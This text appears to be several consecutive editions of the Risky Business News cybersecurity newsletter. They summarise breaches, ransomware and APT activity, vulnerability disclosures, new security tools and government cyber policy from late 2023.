Backdoored Cisco IOS XE devices: Almost two months after the attacks were disclosed, there are more than 23,000 Cisco IOS XE devices that are still infected with a backdoor named BadCandy. The number of infected devices is down by just 46%, despite calls from several national CERT and cybersecurity teams to patch devices and remove the backdoor. The devices were infected at the end of September after a yet-to-be-identified threat actor used a combination of two zero-days (CVE-2023-20273 and CVE-2023-20198) in Cisco's IOS XE operating system.
Malware technical reports
macOS proxy malware: Kaspersky researchers have spotted a proxy trojan targeting macOS users disguised in cracked macOS software.
P2PInfect: Cado Security has spotted a new version of the P2PInfect botnet targeting MIPS-based devices.
BlueSky ransomware: The DFIR Report team looks at attacks with the BlueSky ransomware, deployed on networks following brute-force attacks on MSSQL databases.
DanaBot: OALABS researchers have published IOCs and TTPs for the DanaBot malware.
SpyLoan: ESET looks at a class of Android spyware apps it calls SpyLoan that disguise themselves as loan apps. The apps were downloaded more than 12 million times and generally targeted users in Southeast Asia, Africa, and Latin America.
Sponsor Section
In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.
APTs, cyber-espionage, and info-ops
Bluenoroff's RustBucket: Kaspersky researchers have looked at a macOS malware loader named RustBucket that has been used by North Korean hacking group Bluenoroff in its recent operations. See similar reports from Elastic, Sekoia, Jamf, and SentinelOne.
Doppelgänger: Recorded Future has spotted new info-op activity from Russian group Doppelgänger. The recent campaign targeted audiences in Ukraine, Germany, and the US using AI-generated content on fake news sites and social media accounts.
APT28 Outlook/Exchange attacks: Russian hacking group APT28 has continued to relentlessly exploit a former Outlook zero-day (CVE-2023-23397) throughout the year, even after Microsoft rolled out patches for the bug in March. APT28 used the zero-day to steal NTLM passwords from unpatched systems and then pivot to internal networks from one single compromised host. Besides the Outlook zero-day, the group also used password spraying attacks to gain access to Exchange email servers and steal inbox content. According to reports from Microsoft, Proofpoint, and Poland's Cyber Command, the campaign targeted a wide range of organizations across Europe and North America and didn't appear to have lost any steam after Microsoft rolled out patches. The APT28 group has been linked to Russia's GRU military intelligence service.
Image: Proofpoint
Vulnerabilities, security research, and bug bounty
Android security updates: The monthly security updates for Android smartphones are out. The December update includes fixes for three zero-days Qualcomm reported under attack in October. Qualcomm also released details and patches for the three—tracked as CVE-2023-33106, CVE-2023-33107, and CVE-2023-33063.
Apache CouchDB security update: The Apache CouchDB team issued a rare security update, recommending that all users patch immediately.
Cisco vulnerability: Cisco has patched a Firepower VPN bug that was leaked online. No exploitation has been seen in the wild yet.
PsFree: A developer named CelesteBlue has published PsFree, a WebKit-based exploit for rooting PlayStation 4 and 5 systems.
Outlook attack vectors: Check Point researcher Haifei Li analyzes the attack surface of Microsoft Outlook.
Fake Lockdown Mode: Jamf researchers have developed a technique that can be used to fool users into thinking they enabled Lockdown Mode on their iPhones.
MTG Arena bug: SpecterOps researcher Daniel Mayer has found a bug in the Magic: The Gathering Arena game that could be abused to force opponents to concede games.
Train PLC research: A German security researcher named Q3k has found hidden code inside the Newag smart trains that would show bogus errors and lock up the train when it was serviced at third-party workshops.
Thirdweb vulnerability: Web3 software vendor Thirdweb has asked developers to take steps to mitigate a vulnerability the company found in its smart contract SDK. Thirdweb says the vulnerability impacts more than 20 popular smart contracts. Any company that deployed a smart contract with the Thirdweb SDK before November 22 is considered vulnerable and exposed to crypto-asset thefts. The company says it has not observed any exploitation of the bug prior to its disclosure.
MW WP Form vulnerability: Wordfence researchers have found an unauthenticated file upload vulnerability in the MW WP Form plugin that can lead to arbitrary code execution. Tracked as CVE-2023-6316, the vulnerability has a severity rating of 9.8/10. The plugin is currently installed on more than 200,000 WordPress sites, making it ideal for mass exploitation.
ColdFusion exploitation: A threat actor is exploiting an Adobe ColdFusion vulnerability patched in March to gain access to US government systems. CISA says the attackers have compromised and backdoored two servers in operations in June and July. The ColdFusion vulnerability was a zero-day (CVE-2023-26360) when it was patched in March, but it's unclear if this is the same original attacker.
SLAM: VUSec researchers have published details on SLAM, a new Spectre-like side-channel attack on Intel, AMD, and Arm CPUs.
EXOS vulnerabilities: Rhino Security has found and helped patch four vulnerabilities in EXOS, the operating system running on ExtremeNetworks switches.
"At the time of these findings, there were over 1000 devices exposed to the internet running the vulnerable EXOS versions, determined using a Shodan search."
ownCloud vulnerabilities: French security firm Ambionics looks at the technical details behind two recent ownCloud vulnerabilities that are being exploited in the wild.
Hugging Face token leaks: Lasso Security has found more than 1,600 API tokens for the Hugging Face AI development service exposed on the internet via GitHub repositories. The tokens allow attackers to access ML and AI-based tools developed using the Hugging Face service. Lasso says that some of the tokens belonged to large companies such as Microsoft, Meta, Google, and VMware.
Go repojacking: More than 15,000 Go libraries are managed through GitHub accounts that are vulnerable to repojacking attacks. According to security firm VulnCheck, more than 9,000 repositories are vulnerable to repojacking due to GitHub username changes, while another 6,000 are vulnerable to repojacking due to the original owner's account deletion. VulnCheck says that the 15,000 GitHub repos support more than 800,000 versions of Go modules, including some popular ones.
"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on. A third-party can’t reasonably register 15,000 GitHub accounts. Until then, it’s important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from."
Infosec industry
HIBP reaches 10 years: The Have I Been Pwned database is celebrating its 10th anniversary. Pwnage count is 731 databases and 12.8 billion accounts.
Acquisition news: Cloud security firm Wiz has acquired Raftt, a startup that provides easy-to-use developer-centric Kubernetes environments.
New tool—ADOKit: IBM's X-Force team has open-sourced ADOKit, a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. A whitepaper is also available [PDF].
New tool—FARA: Security researcher Bart Blaze has released FARA, a repo with purposefully erroneous Yara rules, meant as a training vehicle for new security professionals.
New tool—Sonicwall-NSV-Decrypter: Security firm Praetorian has released a tool named Sonicwall-NSV-Decrypter that can be used to jailbreak Sonicwall NSv virtual firewall appliances and decrypt LUKS partitions.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
ICANN, the non-profit organization that manages domain names and IP addresses, has launched a new service to help law enforcement agencies and cybersecurity professionals obtain redacted and non-public data on domain owners.
Named the Registration Data Request Service (RDRS), the service works as a ticketing system that interconnects investigators with domain registrars—the smaller organizations that manage each TLD domain space.
The new system is designed to create private communication channels where investigators can file requests with domain registrars in a more centralized fashion.
Currently, investigators can file legal requests or abuse reports with each registrar, but the idea behind RDRS is to create a place where requests from "verified" parties can be honored faster and with a higher degree of trust.
The idea is not new, and such systems already exist for social networks, email providers, and cloud-hosting companies. These are specialized portals—managed by either the company or law enforcement—where agents can file requests about a company's users as part of emergency responses or ongoing investigations. Breaches in such systems have usually given hackers access to a wide spectrum of personal data.
ICANN says it launched the service after the EU passed the GDPR, a stringent data protection law that forced domain registrars to redact information on domain owners from their publicly available WHOIS databases.
Such information is still present in the private databases of domain registrars and has been made available to some organizations, but usually only in a very limited fashion, such as court orders, subpoenas, or following intelligence-sharing agreements.
However, the removal of WHOIS data from the public domain has, without a doubt, made the internet a worse place.
It allowed—and still allows—criminal, malware, and online fraud operations to hide and operate for longer times, as law enforcement and infosec professionals get bogged down in paperwork or never get answers from some registrars.
RDRS is most likely a step in the right direction, but as ICANN says on the portal's front page, the service is just a limited two-year "proof of concept" and may be abandoned.
Breaches, hacks, and security incidents
Trellance ransomware attack: About 60 US credit unions are dealing with network outages after a ransomware gang hit Trellance, one of their shared IT providers. The incident took place on Sunday, November 26, and is still ongoing, according to the US National Credit Union Administration. The full extent of the incident is still unknown, but Trellance is said to be rebuilding its systems. [Additional coverage in The Record]
Safe wallet hacks: A threat actor has stolen an estimated $5 million worth of crypto assets from the owners of Safe cryptocurrency wallets. Twenty-one victims have been identified so far. The hacks have taken place over the past four months, with ten victims losing more than $2 million over the past week alone. According to Web3 security firm ScamSniffer, the attackers used a technique known as "address poisoning." The technique involves flooding a victim with smaller transactions in order to poison wallet history and hoping the victim copies one of the wrong addresses and sends money to the threat actor.
Unitronics hacking spree: The US government has confirmed that an Iranian hacking group named Cyber Av3ngers has gained access to equipment at water facilities across multiple US states. CISA, the FBI, the NSA, and other agencies say the attacks began as far back as November 22 and exploited PLCs manufactured by Israeli company Unitronics. The group targeted Unitronics PLCs that were still using the default password "1111." CISA asked US organizations last week to change the default password, enable MFA, and remove the devices from the internet. US officials say the Cyber Av3ngers group is affiliated with the IRGC, an Iranian military and intelligence organization. According to the Shadowserver Foundation, from 500 to 800 Unitronics PLCs are currently exposed on the internet, with the vast majority in Australia and Singapore.
General tech and privacy
US TikTok ban fails in court: A judge shot down Montana's attempt to formally and fully block the TikTok app across the state. The ban was meant to go into effect on January 1, 2024. The judge ruled that the ban violated the US Constitution's First Amendment in more ways than one. [Additional coverage in NPR]
Google RCS: Google says its RCS messaging system is now enabled on more than one billion Android devices.
Government, politics, and policy
New SSSCIP head: The Ukrainian government has appointed Yurii Myronenko as the new head of the State Service of Special Communications and Information Protection of Ukraine (SSSCIP). Myronenko was appointed after the government sacked the previous head, Yurii Shchyhol, following an investigation into alleged embezzlement. Prior to his appointment, Myronenko was a UAV strike squadron commander for SSSCIP.
UK Online Fraud Charter: Twelve of the world's largest tech companies have agreed to introduce new rules to fight online fraud as part of a new agreement signed with the UK government named the Online Fraud Charter. New measures include verifying new advertisers, promptly removing any fraudulent content, and better user verification for online marketplaces and dating services. The companies will also establish direct lines for law enforcement to report fraudulent content. The 12 signatories include Amazon, eBay, Facebook, Google, Instagram, LinkedIn, the Match Group, Microsoft, Snapchat, TikTok, Twitter, and YouTube.
EU Cyber Resilience Act: The European Council and the European Parliament have reached a political agreement on the Cyber Resilience Act, a piece of legislation meant to improve the security of smart devices sold in the EU. The new regulation applies to products ranging from baby monitors and smartwatches to firewalls and routers. Under the new rules, vendors will have to establish processes to receive reports about vulnerabilities and must support products for at least five years. Products will have to come with free and automatic security updates as the default option, must ensure data confidentiality using encryption, and vendors must inform authorities of any attacks. The new rules will come into effect three years after the CRA is formally voted on the EU Parliament floor.
EU Cyber Force: In a speech last week, European Council president Charles Michel advocated for the creation of an EU cyber force with "offensive capabilities."
Wyden blocks Haugh vote: Oregon senator Ron Wyden says he intends to block the vote for Lt. Gen. Timothy Haugh to serve as director of the National Security Agency (NSA). Sen. Wyden says he intends to block a vote until "the NSA discloses whether it is buying Americans' location data and web browsing records."
US Federal Cybersecurity Workforce Expansion Act: US lawmakers have introduced bipartisan, bicameral legislation that will create two new cybersecurity training programs with the federal government. Named the Federal Cybersecurity Workforce Expansion Act, the bill is one of the many recent attempts by the US government to address its existing cybersecurity workforce shortage. Under the bill, one of the training programs will be run by CISA, while the other will be housed by the Department of Veterans Affairs and will be exclusively available to veterans.
State Department reward: The US State Department is offering a $10 million reward for information on new methods and technologies used by North Korean hackers to launder their funds. The reward was put up a day after the US seized and sanctioned Sinbad, a cryptocurrency mixing service used by DPRK hackers to launder hacked crypto funds.
House hearing on supply chain security: The House Subcommittee on Cybersecurity, Information Technology, and Government Innovation held a hearing on the state of software supply chain security last week.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren’t set up to detect and deal with that kind of behavior.
Cybercrime and threat intel
Platypus hackers freed in France: A French court has set free two suspects accused of stealing $9.5 million worth of crypto assets from DeFi platform Platypus Finance in February this year. Aged 20 and 18, Mohammed M. and Benamar M. were arrested a week after the hack in the Paris suburb of Aubervilliers. The two brothers claimed in court they acted in good faith and were just conducting white-hat ethical hacking. The duo said they found a vulnerability in the Platypus platform and moved the funds before a hacker could steal them. [Additional coverage in LeMonde/non-paywall]
Trickbot member pleads guilty: A Russian national has pleaded guilty to his role in developing and deploying the Trickbot malware. As part of the Trickbot gang, Vladimir Dunaev developed browser modifications and malicious tools that aided Trickbot in stealing credentials and deploying additional malware on infected computers. Dunaev was arrested in late 2021 after getting stuck in South Korea due to COVID-19 travel restrictions. He was extradited to the US and charged a month later. Dunaev now faces a maximum penalty of 35 years in prison.
New npm malware: Twenty-one malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Cyber Toufan wiping campaign: A pro-Palestinian hacktivist group named Cyber Toufan is conducting data-wipingcampaigns. The group claims it is attacking companies supporting Israel, but we all know they're just hitting anyone with an exposed system and re-framing it as "hacktivism" in the context of the Israel-Hamas war.
New Twisted Spider activity: A threat actor known as Twisted Spider is using the DanaBot malware to gain access to corporate networks and then deploy the Cactus ransomware via hands-on activity. Spotted by Microsoft, the initial DanaBot infections occur via malvertising campaigns. The Twitsted Spider group appears to have switched to using DanaBot for initial access after authorities took down the QakBot botnet at the end of August. Twisted Spider is a known affiliate for different ransomware services, such as REvil, Maze, and Egregor.
UAC-0006: Ukraine's CERT team has published a report on UAC-0006, a cybercrime group that has recently targeted members of the Ukrainian society to steal funds from their accounts. The group's primary tool has been SmokeLoader.
AeroBlade: A threat actor named AeroBlade is targeting organizations in the US aerospace sectors with the goal of conducting commercial cyber espionage. Discovered by BlackBerry's security team, the group appears to have set up infrastructure in September 2022 and began attacks in July this year. AeroBlade's s modus operandi includes phishing operations and the deployment of reverse shells for future reconnaissance.
M-13 profile: Security firm StrikeSource looks at M-13, a Russian company that provides software to the Russian government. Its offerings include the likes of Katyusha, Arena, Arsenal, and Strike. All are tools to mine and monitor news platforms and social media. Its owner, Vladislav Klyushin, was sentenced to nine years in prison in the US for hacking companies and making $93 million on the stock market using the stolen files.
"M-13's offerings are lackluster, to say the least, and far less than what would be hoped for from an organization with ties to the GRU. In comparison to what was seen with NTC Vulkan, M-13's capabilities make it seem as though the software side of its business was merely a front for its hacking and fraud operations which behind the scenes were used to enrich Klyushin and his co-defendants to the tune of tens of millions."
Amadey interview: A security researcher named G0njxa has interviewed InCrease, the author of the Amadey loader.
Internet bot traffic: An Arkose Labs report [PDF] has found that automated bots accounted for roughly 73% of the internet traffic the company monitored throughout the third quarter of 2023. Not all bots were malicious, and some were used for automation and other tasks. According to the company, the top web threats they tracked in Q3 were fake account creation, account takeovers, and web scraping.
Lumma campaign: The Perception Point team looks at a recent phishing campaign delivering the Lumma Stealer.
Booking campaign: Secureworks analyzes a phishing campaign targeting Booking.com users with the Vidar infostealer.
WP phishing campaign: A threat actor is posing as the WordPress security team in a phishing campaign targeting owners of WordPress sites. The campaign is advertising a patch for a non-existent CVE (CVE-2023-45124) and lures site admins into installing a backdoored plugin.
Malware technical reports
Stealc: MSSP Lab has published a two-part series on Stealc, a new infostealer that has been advertised on the cybercrime underground since the start of the year. Additional information via Sekoia, too.
DanaBot: CyFirma researchers look at DanaBot, a versatile malware strain that has been going around since 2018.
Turtle ransomware: Researchers have found a new ransomware strain named Turtle that can encrypt files on Windows, Linux, and macOS systems.
Akira ransomware: French security firm Intrinsec has published a technical report on the typical operations of an Akira ransomware intrusion.
Sponsor Section
In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.
APTs, cyber-espionage, and info-ops
US Treasury sanctions Kimsuky: The US Treasury Department has sanctioned North Korean hacking group Kimsuky for its intelligence collection operations. The group has been active since 2012 and operates under the Reconnaissance General Bureau (RGB), North Korea's primary foreign intelligence service. It is also known in infosec nomenclature as APT43, Emerald Sleet, Velvet Chollima, TA406, and Black Banshee. Kimsuky joins the likes of Lazarus, Andariel, and Bluenoroff, three other North Korean hacking groups sanctioned in September 2019.
APT-C-28 (ScarCruft): Chinese security firm Qihoo 360 has published a report on North Korean hacking group APT-C-28 (ScarCruft, Reaper, APT37) and its recent campaigns delivering the Chinotto backdoor.
CL-STA-0002: PAN Unit42 researchers have identified a new APT group that has recently carried out operations against organizations in the Middle East, Africa, and the US. Tracked as CL-STA-0002, evidence suggests the group has been active since 2020. Unit42 says the group used custom malware (Agent Racoon, Ntospy, Mimilite) and is most likely a state-sponsored group.
Weekly dose of dumb Russian propaganda: A network of pro-Kremlin online accounts tried to blame a recent storm in Crimea on the US using "climate weapons" in Ukraine. I guess the "bio labs" shtick got old and boring with the troll farm employees.
Vulnerabilities, security research, and bug bounty
French govt bug bounty program: The French government will pay up to €20,000 to bug hunters to find vulnerabilities in its FranceConnect and AgentConnect online platforms. The two are authentication systems used by regular citizens and government employees to log into official government sites. This is the second bug bounty program the French government has set up this year after launching a similar effort for the maProcuration attorney-finding platform in May. [Additional coverage in Le Parisien]
CISA KEV update: CISA has removed a D-Link router vulnerability tracked as CVE-2022-28958 from the KEV database of actively exploited vulnerabilities. CISA says it removed the KEV entry after the vulnerability's CVE identifier was revoked. MITRE withdrew the identifier after VulnCheck researcher Jacob Baines discovered that the vulnerability never existed and filed a dispute to have it removed from the National Vulnerabilities Database.
EPPS intro: Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, has published a 14-minute introduction to the Exploit Prediction Scoring System (EPSS). Managed by FIRST, the system is currently supported alongside CVSS by more than 50 security products.
Connected zero-days: A Chrome zero-day and two Safari zero-days that were patched last week are connected, according to Google TAG researcher Maddie Stone.
VMware security update: VMware has finally released a software patch for a security flaw it first announced two weeks ago in the Cloud Director Appliance, tracked as CVE-2023-34060.
Zoom vulnerability: AppOmni researchers have identified a vulnerability in the Zoom web conferencing service that could have allowed threat actors to hijack Zoom Rooms.
Vulnerabilities in court case systems: Security researcher Jason Parker has discovered multiple vulnerabilities in the web-based case and document management systems used by multiple US courts. The vulnerabilities could have allowed threat actors to access sensitive court records related to civil and criminal cases. Although the majority did, not all of the affected courts have rolled out patches. [Additional coverage in TechCrunch]
O-RAN vulnerabilities: Trend Micro researchers have identified vulnerabilities in the Open Radio Access Network (O-RAN) mobile specification that can be used to crash or spoof information inside a crucial component of 5G network architectures.
Infosec industry
Nullcon 2023 videos: Talks from the Nullcon 2023 security conference, which took place in September, are available on the conference's official website.
New tool—Tricard: Unicorn Security has open-sourced a tool named Tricard that can fingerprint and detect malware sandboxes.
New tool—ASRGEN: Splunk's Michael Haag has released a tool named ASRGEN that can test configurations that can reduce a system's attack surface. The code is on GitHub as well.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.
This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The Black Basta ransomware gang is believed to have made more than $107 million in ransom payments since the group began operations in early 2022.
The number represents payments made by more than 90 victims of the 329 organizations known to have been hit by the gang.
The largest payment was $9 million, while the average ransom payment was $1.2 million, according to joint research published by blockchain tracking company Elliptic and cyber insurance provider Corvus Insurance.
Although all ransomware "earnings" estimates are extremely inaccurate, this would put Black Basta in the upper echelon of the "best-earning" ransomware groups of the past years.
Conti - $25.5 million between July and November 2021
Netwalker – $25 million between March and July 2020
Dharma - $24 million between November 2016 and November 2019
The group itself began operations in early 2022. The group appeared shortly after the implosion of the Conti group, itself a Ryuk rebrand.
It is widely believed in the infosec community that former members of the Conti gang splintered off and created multiple ransomware gangs after the gang's demise in early 2022—precipitated by a dox of Conti operations, itself caused by Conti admins proclaiming their allegiance to Russia following its invasion of Ukraine.
In its dying days, Conti denied any affiliation with the group, which is why some companies still don't track Black Basta as a Conti offshoot. With the Conti source code leaked online, they might be right, or they might have been trying to sabotage an unwanted competitor—we'll never know.
While the gang advertised its Ransomware-as-a-Service portal in underground forums for weeks, the first actual Black Basta attacks were spotted in the wild in April 2022, when the group's ransomware strain was also detected.
Since then, the gang's tactics have revolved around two ways of breaching their victims. The first relies on exploiting recently patched vulnerabilities in networking and enterprise applications (i.e., CitrixBleed, PrintNightmare, ZeroLogon, etc.). The second relies on buying access to corporate networks infected by other malware gangs (i.e., SystemBC, PikaBot, Qakbot).
A SentinelOne report claims Black Basta may have also started working with the FIN7 threat actor or at least recruited former FIN7 developers. With the cybercrime ecosystem being a mess of shady connections and a limited coding talent pool, this isn't that hard to believe.
As for its activities, the gang has been extremely proficient. Its activity can be described as a mix of large pulses of attacks and periods of total quiet. In some months, Black Basta has been one of the Top 5 most active groups, while in others, they have been nowhere to be found, spurring rumors of a possible shutdown.
Some of the gang's biggest victims include UK outsourcing giant Capita, German arms manufacturer Rheinmetall, industrial automation company ABB, food retail giant Sobeys, and, more recently, the Toronto Public Library.
Elliptic and Corvus note that many of the gang's successful extortions were laundered through Garantex, a sanctioned Russian cryptocurrency exchange. The same exchange was previously used by the Conti gang to launder its funds as well.
Putting inaccurate estimates on ransomware gangs might sound like a waste of time, but these numbers often inform law enforcement agencies of the biggest threats they might want to target. So, let's keep them coming.
For technical reports on the Black Basta crew, visit their Malpedia page.
Screenshot of the Black Basta dark web leak site
Breaches, hacks, and security incidents
Okta data breach:Okta says that the hackers who breached its customer support system in October stole data on all its customers. The company says that some of its own employee information was also accessed. Initially, Okta said that only 1% of its customers had data stolen. The company is currently notifying all customers via email and asking organizations to enable MFA for their Okta admin accounts.
Staples incident: Office supply retail chain Staples took down some of its IT systems to contain a cybersecurity incident. The company says it is restoring affected systems, but the incident is affecting its ability to process and deliver orders via its official website. Staples did not say if it is facing a ransomware attack and directed customers to its stores for urgent orders. [h/t EoA]
JAXA hack: A threat actor has breached the Japan Aerospace Exploration Agency after exploiting a vulnerability in a network device. According to Japanese media, the hack took place over the summer but JAXA didn't notice the intrusion and only recently learned of the breach from law enforcement. The agency says the hacked systems did not contain information on its rocket and space technology. [Additional coverage in Nippon]
Dollar Tree breach: The personal details of almost 2 million Dollar Tree users were stolen during a security breach at one of the retail chain's subcontractors. Dollar Tree is a Fortune 500 company that operates more than 15,000 discount-price stores across the US and Canada.
Capital Health incidents: A cybersecurity incident that took place during Thanksgiving is impacting the activities at hospitals operated by US provider Capital Health. Hospitals in New Jersey and Pennsylvania are experiencing network outages following the attack. The incident comes as hospitals owned by Ardent Health in six states are seeing similar issues.
KyberSwap hack: The hacker who stole $55 million (updated from $46 million) worth of crypto assets from the KyberSwap exchange posted their conditions for returning the stolen assets. The tl;dr is that they want the current leadership ousted and control over the entire platform, which is unlikely to happen.
Image via TheDEFIac/Twitter
General tech and privacy
Plex privacy disaster: Plex media server users are receiving "week in review" reports with what their friends have been watching on their devices. The reports have stirred quite a controversy, as it exposes some users' porn preferences. [Additional coverage in 404 Media]
Rivian snafu: Car software maker Rivian fixed a buggy firmware update that bricked 3% of the company's infotainment systems. The company blamed the bug on a bad certificate. Rivian said it tested the firmware update on more than 1,000 vehicles before it went out, but the bug did not show up in tests. [Additional coverage in Electrek]
New meme TLD: Google has released a new .meme top-level domain. Lets hope they stick with it this time and don't dump it on another company like they did with .zip.
RETVec: Google has developed and provided more details on a system called RETVec that the company has been using inside Gmail to detect spam and malicious emails. The tool was also open-sourced on GitHub.
"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more. The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently. Thus, RETVec works out-of-the-box on over 100 languages without the need for a lookup table or fixed vocabulary size."
WhatsApp Secret Code: Meta has rolled out a new feature named WhatsApp Secret Code that lets users lock and put sensitive conversations behind a password prompt.
"Secret code starts rolling out today, and in the coming months will be available globally."
Government, politics, and policy
CISA issues first SbD alert: CISA has published its first-ever "Secure by Design" alert. The first SbD document urges software vendors to take action and design more secure web management interfaces. CISA recommendations include disabling a product's web management interface by default and configuring products to stop operating when the web management interface is exposed on the internet. Umm... that's bold!
French govt bans foreign E2EE apps: France has banned government officials from using foreign encrypted messaging services like Telegram, Signal, and WhatsApp. The government is notifying ministers and their cabinet staff that they have to uninstall the apps from their devices by December 8. Instead, French officials have been told to use locally-developed alternatives like Tchap and Olvid. Officials cited privacy risks and a need to "advance towards greater French technological sovereignty." [Additional coverage in Le Figaro]
Spyware in Canada: Thirteen Canadian government agencies and federal departments have access to spyware and hacking tools, according to documents obtained by Radio-Canada. The list includes law enforcement agencies but also departments that deal with environmental protection, climate change, and natural resources. The tools have features that can recover and analyze data found on computers, tablets, and mobile phones. Some tools can recover data from cloud services, and some can recover encrypted and password-protected information. Suppliers include companies like Cellebrite, Magnet Forensics, and Grayshift. [Additional coverage in CBC]
Image via the CBC
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Corelight CEO Brian Dye about the value of data from NDR tools when it comes to long-term incident response.
Cybercrime and threat intel
HackingTeam founder arrested for attempted murder: The founder of the now-defunct spyware maker HackingTeam was arrested in Italy. David Vincenzetti was detained by authorities over the weekend after allegedly stabbing a family member. After rambling in court, a judge ordered Vincenzetti to be analyzed for mental health issues. [Additional coverage in TechCrunch]
SSNDOB admin sentenced: A US judge has sentenced a Ukrainian national to eight years in prison for running SSNDOB, an online marketplace that sold the personal information of more than 24 million Americans. Vitalii Chychasov was arrested in March 2022 while attempting to enter Hungary and was extradited to the US in July 2022 when the FBI also seized the SSNDOB portals. Officials say Chychasov made $19 million from running SSNDOB, which ran on five different domains.
Money launderer sentenced: A Florida judge has sentenced an Indian national to four years and three months in prison for laundering money for an Indian call center network. The call center network posed as IRS and FBI agents in a scheme that threatened US citizens with arrests unless they paid a fine to one of their accounts. Officials say Jignesh Purshottambhai Vekaria worked throughout 2018 to transfer funds collected in the US to his accomplices in India.
US seizes Sinbad mixer: The US government has sanctioned and seized Sinbad, a cryptocurrency mixing service. The service was used by North Korean hackers to launder funds stolen from cryptocurrency platforms like Horizon Bridge, Axie Infinity, Stake, FTX, BadgerDAO, CoinEx, and Atomic wallet owners. US officials say the service was also used to obfuscate transactions linked to sanctions evasion, drug trafficking, and the purchase of child sexual abuse materials. Sinbad launched in February this year and is believed to be a rebrand of Blender, another cryptocurrency mixing service. Blender was sanctioned by the US Treasury in May 2022, also for helping North Korean hackers launder stolen funds.
CISA warns of Unitronics exploitation: CISA is warning that a threat actor is most likely exploiting weak passwords to take control of Unitronics PLCs used in the US water management sector. The agency is asking organizations to enable MFA and remove the devices from the internet or place them behind a firewall. While CISA did not name the threat actor, they are most likely referring to an Iranian hacktivist group known as Cyber Av3ngers. The group hacked water pumps in the town of Aliquippa, Pennsylvania, last week after exploiting Unitronics PLCs.
Cactus Qlik exploitation: The Cactus ransomware gang is exploiting three vulnerabilities in Qlik Sense business analytics servers for initial access to corporate networks. All three vulnerabilities were discovered by security firm Praetorian and patched in August and September this year. Security firm ArcticWolf spotted the attacks on Qlik servers, which appear to have begun this week.
Rare Wolf: Russian security firm BI.ZONE looks at the tactics of Rare Wolf, a threat actor targeting Russian users and organizations.
Shadow/Comet/Twelve: Russian security firm FACCT analyzes a cybercrime group that has been known to go under different names, such as Shadow, Comet, and Twelve. The group is known for carrying ransomware attacks on Russian companies. FACCT says the group's most recent victim is a factory of one of Russia's semiconductor companies.
ScamClub: Malwarebytes has detected a malvertising campaign orchestrated by the ScamClub threat actor that managed to plant malicious ads on respectable sites like the Associated Press, ESPN, and CBS.
Malware technical reports
Mobile spyware cluster: Symantec looks at an Android spyware cluster. No details on whose malware is this.
FjordPhantom: Promon has discovered a new Android banking trojan named FjordPhantom that uses virtualization apps to create virtual containers and hide its malicious behavior from security tools. The malware is currently being spread through messaging spam and targets users in Southeast Asia.
Qakbot servers: Embee researchers have identified 83 servers that are part of the Qakbot botnet infrastructure. Authorities took down the botnet earlier this year, and it's unclear if the 83 servers are part of the gang's new infrastructure or leftovers from the old one. From the detection timestamps on Qakbot malware samples, they seem to be new infrastructure (but don't take my word on it since I'm an idiot about these things).
ScrubCrypt: Human has published an analysis of a recent RedLine stealer campaign employing the ScrubCrypt obfuscator.
Nova: Since September, a new infostealer named Nova has been advertised on the cybercriminal underground.
Serpent: K7 researchers look at Serpent, a new .NET infostealer currently advertised on underground hacking forums.
GoTitan botnet: Fortinet has discovered a new botnet named GoTitan that is currently exploiting a recently disclosed Apache ActiveMQ vulnerability tracked as CVE-2023-46604.
Lockbit ransomware: Chinese security firm Antiy looks at Lockbit, the ransomware gang that attacked the Industrial and Commercial Bank of China.
Cactus ransomware: Logpoint researchers have published a technical analysis of the Cactus ransomware.
Xaro ransomware: Cybereason researchers have spotted a new version of the DejaVu ransomware that they are tracking under the name of Xaro. The ransomware is currently distributed via boobytrapped freeware apps.
Sponsor Section
This week's Risky Business newsletters are brought to you by Corelight. They maintain the open-source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.
APTs, cyber-espionage, and info-ops
Kimsuky: AhnLab published a report on a Kimsuky operation targeting South Korean research institutes.
DPRK crypto-heists: Recorded Future published a report on North Korea's cryptocurrency heists. The report does a good job at putting the size of these operations in context.
"North Korean threat actors were accused of stealing an estimated $1.7 billion worth of cryptocurrency in 2022 alone, a sum equivalent to approximately 5% of North Korea’s economy or 45% of its military budget. This amount is also almost 10 times more than the value of North Korea's exports in 2021, which sat at $182 million, according to the Observatory of Economic Complexity (OEC)."
SugarGh0st RAT: A suspected Chinese threat actor is targeting South Korea and Uzbekistan with SugarGh0st RAT, a modification of the open-source Gh0st RAT malware.
Patchwork: QiAnXin has published a report on the Patchwork APT (APT-Q-36) and its recent campaigns involving the Remcos and Spyder malware.
UAC-0050: Ukraine's CERT team is warning about a series of attacks against government agencies trying to install the Remcos RAT. The agency attributed the attacks to UAC-0050, a threat actor it's been tracking since 2020. Similar attacks were spotted in February and November as well.
Hellhounds: Russian security firm Positive Technologies says that a threat actor named Hellhounds has been conducting intrusions against Russian organizations. PT linked the group to at least 20 intrusions and said Hellhounds hacked and destroyed infrastructure at a Russian telecom operator. Described by the Russian telco as the "Thanos Click" [PDF], the incident resulted in the destruction of customer and billing databases and a day-long outage for the company's customers.
